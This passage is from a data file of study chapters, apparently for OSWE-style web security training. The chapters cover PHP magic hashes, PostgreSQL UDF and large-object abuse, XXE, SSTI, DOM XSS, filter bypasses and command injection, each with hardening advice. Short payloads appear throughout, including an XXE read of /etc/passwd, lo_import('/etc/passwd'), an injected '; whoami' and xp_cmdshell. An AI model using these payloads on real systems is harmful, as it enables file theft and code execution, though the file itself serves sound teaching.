      'The fix is simple but easy to forget: always use strict comparison (`===`) when comparing values whose type should matter, especially password hashes and tokens.',
      'This bug class is PHP-specific in its exact mechanics, but every language with implicit type coercion (JavaScript\'s `==`, for instance) has analogous footguns.',
      'Code review should specifically flag any `==` used for security-sensitive comparisons (password hash checks, HMAC/signature verification, session token comparison).',
    ],
    example: '<?php\nvar_dump("0e123456" == "0e654321"); // true — both parse as 0e... = 0\nvar_dump("0e123456" === "0e654321"); // false — strict comparison, correct',
    exercise: 'In a local PHP REPL, test `var_dump("0e12" == "0e34")` and `var_dump("abc" == 0)` and explain in your own words why each result happens.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html',
    video: yt('PHP type juggling loose comparison vulnerability'),
  },
  {
    intro: 'PostgreSQL supports loading compiled C-language extensions and User-Defined Functions (UDFs) directly into the server process. If an attacker can gain the privileges required to create such a function, they can execute arbitrary native code on the database host.',
    points: [
      'C-language UDFs are loaded as shared libraries (`.so`/`.dll`) and run inside the PostgreSQL server process itself — a UDF vulnerability is a server compromise, not just a data breach.',
      'Creating a C UDF normally requires superuser privileges, so this is usually a post-exploitation escalation technique after achieving admin-level DB access, not an initial foothold.',
      '`CREATE FUNCTION ... AS \'/path/to/lib\', \'symbol\' LANGUAGE C` is the syntax that registers a native function — the path and symbol are exactly what an attacker controls if they can write to disk and reach this privilege level.',
      'Hardening: restrict filesystem write access for the postgres service account, and disable/restrict `CREATE FUNCTION ... LANGUAGE C` to trusted roles only.',
    ],
    example: '-- Registering a native extension function (requires superuser + a compiled shared object)\nCREATE FUNCTION add_one(integer) RETURNS integer\n  AS \'/usr/lib/postgresql/funcs\', \'add_one\'\n  LANGUAGE C STRICT;',
    exercise: 'Read the PostgreSQL C-language functions documentation and explain, in your own words, why requiring superuser privileges to load a C UDF limits (but does not eliminate) the risk of this technique.',
    source: 'https://www.postgresql.org/docs/current/xfunc-c.html',
    video: yt('postgresql user defined functions security'),
  },
  {
    intro: 'Regex-based input filters are a common but fragile defense — a poorly written pattern can be bypassed with edge cases the author never considered: alternate encodings, newline handling differences, or catastrophic backtracking.',
    points: [
      'Anchoring mistakes (forgetting `^`/`$`, or using `.` instead of an explicit allow-listed character class) let malicious input slip through what looks like a strict filter.',
      'Multiline mode and different regex engines handle `.` and `$` differently around newlines — a filter tested against one engine can behave differently in production.',
      'Regular expressions built from untrusted input (rather than as fixed patterns) risk ReDoS (catastrophic backtracking) as well as injection into the pattern itself.',
      'Regex filtering should always be paired with allow-list validation and proper output encoding — never treated as the sole defense for a security-sensitive input.',
    ],
    example: '// Naive filter, bypassable with a newline\nconst blocked = /^admin$/;\nblocked.test("admin\\nextra"); // may still match depending on flags/engine',
    exercise: 'Take a simple regex-based filter (e.g. blocking the literal word "admin") and test it against inputs with different casing, embedded newlines, and Unicode look-alike characters to see which bypasses succeed.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html',
    video: yt('regex bypass filter security vulnerability'),
  },
  {
    intro: '"Magic hashes" are a specific PHP loose-comparison bug (covered conceptually in the Type Juggling chapter) where certain hash strings that begin with "0e" followed by only digits are interpreted as scientific-notation zero, letting two completely different hash values compare as equal.',
    points: [
      'Any hash function whose output can coincidentally start with `0e` followed by digits only is vulnerable if compared with `==` rather than `===`.',
      'This mainly matters for password/token verification code, where an attacker who can influence one side of the comparison (e.g. supply a "magic" input) can forge a match without knowing the real secret.',
      'MD5 and SHA-1 have both been used historically in magic-hash proof-of-concepts because their hex output occasionally happens to start with "0e".',
      'The fix from the previous chapter applies directly: always use `===` (or a constant-time comparison function) for any security-sensitive string comparison.',
    ],
    example: '<?php\n// Two different inputs whose MD5 both happen to look like "0e..." numbers\nvar_dump(md5("240610708") == md5("QNKCDZO")); // true in loose comparison',
    exercise: 'Look up two known "magic hash" MD5 collision strings and verify with `var_dump(... == ...)` in a local PHP sandbox that they compare equal under loose comparison but not under `===`.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html',
    video: yt('PHP magic hash vulnerability explained'),
  },
  {
    intro: 'Bypassing character restrictions covers the general skill of working around input filters that block specific characters (quotes, spaces, slashes) rather than validating the whole input structure — a recurring theme across SQLi, XSS, and command injection.',
    points: [
      'If quotes are blocked but not hex/char encoding, many SQL dialects let you express string literals without a single quote character at all.',
      'If spaces are blocked in command injection contexts, alternatives like `${IFS}`, tabs, or `<` for redirection-based spacing often still work.',
      'Encoding transformations (URL-encoding, double-encoding, Unicode normalization) are the most common way filtered characters slip through as something else entirely by the time they reach the vulnerable sink.',
      'The lesson generalizes: blocklisting individual characters is fragile. Robust defenses validate against an allow-list of expected structure, not against a list of "bad" characters.',
    ],
    example: '-- Bypassing a blocked single-quote in some SQL dialects via hex literal\nSELECT * FROM users WHERE name = 0x61646d696e -- hex for \'admin\', no quote character used',
    exercise: 'On a lab SQLi challenge that blocks single quotes, try rewriting your payload using a hex-encoded string literal instead, and confirm whether the filter still blocks it.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html',
    video: yt('bypassing character filters injection techniques'),
  },
  {
    intro: 'A UDF reverse shell is the practical exploitation outcome of the PostgreSQL User-Defined Function technique covered earlier: once an attacker can register a native C UDF, they can implement a function that spawns a shell connected back to an attacker-controlled listener.',
    points: [
      'This requires the same precondition as any C UDF abuse: sufficient privilege (superuser) to run `CREATE FUNCTION ... LANGUAGE C`, and the ability to place a compiled shared object where PostgreSQL can load it.',
      'The compiled function typically calls a system-level exec/fork routine from within the C UDF body — this is why C-language UDFs are so much more dangerous than UDFs in a sandboxed procedural language (PL/pgSQL).',
      'This is a well-documented post-exploitation technique in tools like Metasploit\'s PostgreSQL modules, used once database-level admin access is already achieved — not an initial-access technique.',
      'Defense: never grant `CREATEROLE`/superuser to application accounts, and monitor for unexpected `CREATE FUNCTION ... LANGUAGE C` statements in database audit logs.',
    ],
    exercise: 'Read the Metasploit PostgreSQL pentesting guide and identify which specific privilege level the documented modules require before a UDF-based code execution technique becomes possible.',
    source: 'https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html',
    video: yt('postgresql UDF reverse shell exploitation'),
  },
  {
    intro: 'PostgreSQL Large Objects provide a stream-oriented storage mechanism for data too large to handle as a normal column value. Because they are accessed via a distinct API (`lo_import`/`lo_export` and related functions), they have their own set of privilege and file-access considerations relevant to security testing.',
    points: [
      'Large objects are referenced by an OID and accessed through a streaming API rather than being embedded directly in a table row, unlike `bytea`.',
      '`lo_export`/`lo_import` functions can read from or write to the server\'s local filesystem — if reachable by a low-privileged database role, this becomes a path to arbitrary file read/write.',
      'Historically, misconfigured large object privileges have been used to write malicious files (e.g. web shells) to a location the web server executes from.',
      'Hardening: restrict `lo_import`/`lo_export` execution to trusted roles, and ensure the database service account has no write access to web-servable directories.',
    ],
    example: "-- Reading server-local file content into a large object (requires appropriate privileges)\nSELECT lo_import('/etc/passwd');",
    exercise: 'Read the PostgreSQL Large Objects chapter and explain, in your own words, why `lo_export`/`lo_import` are more dangerous from a security perspective than a normal `bytea` column.',
    source: 'https://www.postgresql.org/docs/current/largeobjects.html',
    video: yt('postgresql large objects security lo_import lo_export'),
  },
  {
    intro: 'DOM-based XSS occurs entirely on the client: JavaScript reads data from an attacker-controllable source (like `location.hash`) and writes it to a dangerous sink (`innerHTML`, `eval`) without the payload ever necessarily touching the server. "Black box" testing here means finding it purely by observing browser behavior, without source code access.',
    points: [
      'Because the payload may never be sent to the server, traditional server-log-based detection completely misses DOM XSS — it has to be found by inspecting client-side behavior directly.',
      'Common sources: `location.hash`, `location.search`, `document.referrer`, `window.name`. Common sinks: `innerHTML`, `document.write`, `eval`.',
      'Testing approach: place a unique marker string into each source and use browser DevTools to search the live DOM (not "View Source", which shows only the original HTML) for where it ends up.',
      'Burp Suite\'s DOM Invader tooling automates a lot of this source-to-sink tracing for black-box testers.',
    ],
    example: '// Vulnerable pattern\nelement.innerHTML = new URLSearchParams(location.search).get("name");\n// ?name=<img src=x onerror=alert(1)> would execute',
    exercise: 'On a lab DOM XSS challenge (PortSwigger has several), place a marker string into the URL fragment/query and use your browser\'s DevTools search to find where it lands in the live DOM.',
    source: 'https://portswigger.net/web-security/cross-site-scripting/dom-based',
    video: yt('DOM based XSS black box testing tutorial'),
  },
  {
    intro: 'Server-Side Template Injection (SSTI) happens when user input is concatenated directly into a template string before rendering, rather than passed in as data. Depending on the template engine, this can escalate from simple HTML injection to full remote code execution.',
    points: [
      'Detection probe: submit a mathematical expression like `{{7*7}}` — if the rendered output shows `49`, the template engine is evaluating your input as code, not data.',
      'Different template engines (Jinja2, Twig, Freemarker) have different syntax and different levels of sandboxing — identifying the exact engine is a required step before exploitation.',
      'Some engines expose enough functionality in their expression language alone to reach OS command execution directly from a template payload.',
      'Prevention: never concatenate user input into template source; use "logic-less" template engines (e.g. Mustache) where practical, and sandbox any environment that must evaluate user-influenced templates.',
    ],
    example: '# Detection probe in a name/greeting parameter\nhttp://vulnerable-website.com/?name={{7*7}}\n# If page renders "49", template injection is confirmed',
    exercise: 'On a lab SSTI challenge, submit the `{{7*7}}` probe, confirm code evaluation, then try a small set of engine-fingerprinting payloads to identify whether the backend is Jinja2 or Twig.',
    source: 'https://portswigger.net/web-security/server-side-template-injection',
    video: yt('server side template injection SSTI tutorial'),
  },
  {
    intro: 'Weak random token generation undermines password reset links, session IDs, API keys, and CSRF tokens alike — if the token generator is predictable (e.g. seeded from time, or using a non-cryptographic PRNG), an attacker can guess or reconstruct valid tokens without ever intercepting one.',
    points: [
      'Never use a general-purpose PRNG (like `Math.random()` in JavaScript, or `rand()` in many languages) for anything security-sensitive — these are not cryptographically secure and are often predictable given a few samples.',
      'Always use a CSPRNG (`crypto.randomBytes` in Node.js, `secrets` module in Python, `SecureRandom` in Java) with at least 128 bits of entropy for tokens.',
      'Timestamp- or counter-seeded tokens are especially dangerous because the seed space is small enough to brute-force offline once the algorithm is known.',
      'Token length is not the same as entropy — a long token built from a weak/predictable generator is still weak, no matter how many characters it has.',
    ],
    example: '// Vulnerable — Math.random() is not cryptographically secure\nconst token = Math.random().toString(36).slice(2);\n\n// Safe — CSPRNG with sufficient entropy\nconst token = require("crypto").randomBytes(32).toString("hex");',
    exercise: 'Generate 5 password-reset-style tokens using `Math.random()` in a Node.js REPL and look for any obvious pattern (e.g. shared prefixes tied to system time) before comparing against `crypto.randomBytes`.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html',
    video: yt('weak random token generation vulnerability'),
  },
  {
    intro: 'XML External Entity (XXE) injection abuses XML parsers that resolve external entity references by default, letting an attacker read local files, perform SSRF, or cause denial of service — entirely from a maliciously crafted XML document.',
    points: [
      'The classic PoC declares an external entity pointing at a local file (`file:///etc/passwd`) and references it inside the XML body so the parser inlines the file contents into the parsed result.',
      'XXE can also be used for SSRF by declaring an entity pointing at an internal-only HTTP URL instead of a local file.',
      'The single most effective fix is disabling DTD processing and external entity resolution entirely at the parser level — most modern XML libraries default to safe behavior, but many still ship unsafe-by-default in older configurations.',
      'XXE is frequently reachable through unexpected surfaces: SOAP APIs, file uploads (DOCX/XLSX are ZIP archives of XML), and even SVG image uploads.',
    ],
    example: '<?xml version="1.0"?>\n<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<data>&xxe;</data>',
    exercise: 'On a lab XXE challenge, submit the classic file-read payload above against an endpoint that parses XML, and confirm whether the response reflects the target file\'s contents.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html',
    video: yt('XXE XML external entity injection tutorial'),
  },
  {
    intro: 'RCE via database functions is the exploitation pattern that ties together several earlier OSWE chapters (PostgreSQL UDFs, deserialization) — using a database\'s own extensibility features as the mechanism to execute OS-level commands from what starts as a data-layer vulnerability.',
    points: [
      'Different database engines expose different native mechanisms: PostgreSQL C-language UDFs, MSSQL `xp_cmdshell`, MySQL user-defined functions (UDFs) loaded from a plugin directory.',
      'This technique typically requires elevated database privileges — it is most often a post-exploitation escalation from "I have SQL injection" to "I have a shell on the DB host", not the initial foothold.',
      'Because it runs inside the database server process, successful exploitation compromises the entire host, not just the data the application account could normally reach.',
      'Hardening: disable dangerous built-in procedures (`xp_cmdshell` in MSSQL is disabled by default in modern installs), and apply least-privilege database roles so the web application account can never reach admin-only functions.',
    ],
    example: "-- MSSQL: classic (and heavily monitored) command execution via xp_cmdshell\nEXEC xp_cmdshell 'whoami';",
    exercise: 'Research how `xp_cmdshell` is disabled by default in modern MSSQL installations, and explain what specific privilege an attacker would need to re-enable it via `sp_configure`.',
    source: 'https://www.postgresql.org/docs/current/xfunc-c.html',
    video: yt('SQL injection to RCE via database functions'),
  },
  {
    intro: 'OS command injection via WebSockets applies the same command-injection principles you know from HTTP to a different transport: many web apps process WebSocket messages with the same unsafe shell-out patterns, and black-box testing them requires intercepting and manipulating the WebSocket frames directly rather than normal HTTP requests.',
    points: [
      'WebSockets are just as capable of carrying injectable input as any HTTP parameter — the vulnerability class (unsanitized input reaching a shell) is identical, only the transport differs.',
      'Burp Suite\'s WebSockets history/interception tools let you intercept, modify, and replay individual WebSocket messages just like HTTP requests.',
      'Black-box testing WebSocket-driven features often gets skipped by scanners tuned only for HTTP, making manual review of the WebSocket handshake and message flow especially valuable.',
      'Standard OS command injection defenses apply unchanged: avoid shelling out with user input entirely where possible, and if unavoidable, use allow-list validation and pass arguments as an array rather than a concatenated string.',
    ],
    example: '{"action":"ping","host":"127.0.0.1; whoami"}\n// If the server naively shells out with the "host" value, this appends a second command',
    exercise: 'On a lab app that uses WebSockets for any command-like feature, use Burp Suite to intercept a WebSocket message, and try appending a command separator (`;`, `&&`) to a parameter to see if it is reflected or executed.',
    source: 'https://portswigger.net/web-security/os-command-injection',
    video: yt('websocket OS command injection black box testing'),
  },
];
